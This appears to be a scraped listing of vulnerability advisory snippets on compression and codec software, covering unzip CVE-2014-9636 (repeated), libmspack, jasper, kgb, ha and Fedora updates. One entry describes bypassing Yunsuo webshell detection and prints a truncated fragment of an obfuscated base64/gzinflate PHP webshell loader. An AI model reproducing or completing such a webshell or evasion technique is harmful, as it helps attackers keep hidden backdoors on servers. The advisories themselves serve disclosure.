ALPINE-CVE-2014-9636
unzip 6.0 allows remote attackers to cause a denial of service (out-of-bounds read or write and crash) via an extra field with an uncompressed size smaller than the compressed field size in a zip archive that advertises STORED method compression...
CVE-2014-9636
unzip 6.0 allows remote attackers to cause a denial of service (out-of-bounds read or write and crash) via an extra field with an uncompressed size smaller than the compressed field size in a zip archive that advertises STORED method compression...
Out-of-bounds
unzip 6.0 allows remote attackers to cause a denial of service (out-of-bounds read or write and crash) via an extra field with an uncompressed size smaller than the compressed field size in a zip archive that advertises STORED method compression...
CVE-2014-9636
unzip 6.0 allows remote attackers to cause a denial of service (out-of-bounds read or write and crash) via an extra field with an uncompressed size smaller than the compressed field size in a zip archive that advertises STORED method compression...
Libmspack CHM Decompression Divide by Zero Denial of Service Vulnerability
Libmspack is a library of related Microsoft compression formats such as CAB, CHM, HLP, LIT, KWAJ and SZDD. Libmspack's handling of specially crafted CHM files suffers from a divide-by-zero denial-of-service vulnerability, which can be exploited by remote attackers to crash an application...
Updated cabextract packages fix CVE-2014-9556
Updated cabextract packages fix security vulnerability: Libmspack, a library to provide compression and decompression of some file formats used by Microsoft, is embedded in cabextract. A specially crafted cab file can cause cabextract to hang forever. If cabextract is exposed to any...
Libmspack Null Pointer Reference Denial of Service Vulnerability
Libmspack is a library of related Microsoft compression formats such as CAB, CHM, HLP, LIT, KWAJ and SZDD. Libmspack's handling of specially crafted CAB files suffers from a null pointer reference denial-of-service vulnerability, which attackers can exploit to crash applications...
Analysis of Flash Zero Day Shows Layers of Obfuscation
The Flash zero day that made its way into the Angler exploit kit was wrapped in multiple layers of obfuscation and has the ability to inject its malicious payload straight into users’ browsers. In the last week, since the news broke of the Adobe Flash zero-day flaw appearing in the Angler kit,...
jasper security update
CentOS Errata and Security Advisory CESA-2015:0074 Updated jasper packages that fix two security issues are now available for Red Hat Enterprise Linux 6 and 7. Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores,...
kgb directory traversal vulnerability
KGB is a free compression tool with high compression ratio. A directory traversal vulnerability exists in kgb, which can be exploited by a remote attacker to overwrite arbitrary files under the application using a specially crafted request with a directory traversal sequence '... /' to overwrite...
Multiple directory traversal vulnerability in ha
ha is a set of compression software using the HSC compression algorithm developed by software developer Mikhail Gusarov. A multiple directory traversal vulnerability exists in ha, which could be exploited by a remote attacker to read arbitrary files within the context of the application...
[SECURITY] Fedora 21 Update: jasper-1.900.1-29.fc21
This package contains an implementation of the image compression standard JPEG-2000, Part 1. It consists of tools for conversion to and from the JP2 and JPC formats...
[SECURITY] Fedora 19 Update: jasper-1.900.1-26.fc19
This package contains an implementation of the image compression standard JPEG-2000, Part 1. It consists of tools for conversion to and from the JP2 and JPC formats...
[SECURITY] Fedora 20 Update: jasper-1.900.1-27.fc20
This package contains an implementation of the image compression standard JPEG-2000, Part 1. It consists of tools for conversion to and from the JP2 and JPC formats...
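Yunsuo latest version 1.3.145 webshell detection bypass
Brief description: webshell detection bypass. Detailed description: one-line webshell plus full-featured webshell bypass detection. Proof of vulnerability: 1. One-line webshell: using this approach alone will certainly be detected, so we use this approach: The result shows that only the kind of file mentioned at the start was detected: 2. Full-featured webshell, using base64 + gzinflate compression encoding; the webshell file is as follows: ?php function CLsI$ZzvSWE $ZzvSWE=gzinflatebase64decode$ZzvSWE; for$i=0;$istrlen$ZzvSWE;$i++ $ZzvSWE$i = chrord$ZzvSWE$i-1; return $ZzvSWE;...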
[SECURITY] Fedora 19 Update: openjpeg-1.5.1-13.fc19
OpenJPEG is an open-source JPEG 2000 codec written in C. It has been developed in order to promote the use of JPEG 2000, the new still-image compression standard from the Joint Photographic Experts Group (JPEG)...
CVE-2014-9636
unzip 6.0 allows remote attackers to cause a denial of service (out-of-bounds read or write and crash) via an extra field with an uncompressed size smaller than the compressed field size in a zip archive that advertises STORED method compression...
UBUNTU-CVE-2014-9636
unzip 6.0 allows remote attackers to cause a denial of service (out-of-bounds read or write and crash) via an extra field with an uncompressed size smaller than the compressed field size in a zip archive that advertises STORED method compression...
DNS Label Compression Recursion Denial of Service - Ver2 (CVE-2007-1030)
A denial-of-service vulnerability has been reported in Niels Provos Libevent. Successful exploitation of this vulnerability would allow a remote attacker to create a denial of service condition on the affected system...
[SECURITY] Fedora 21 Update: flac-1.3.1-1.fc21
FLAC stands for Free Lossless Audio Codec. Grossly oversimplified, FLAC is similar to Ogg Vorbis, but lossless. The FLAC project consists of the stream format, reference encoders and decoders in library form, flac, a command-line program to encode and decode FLAC files, metaflac, a command-line...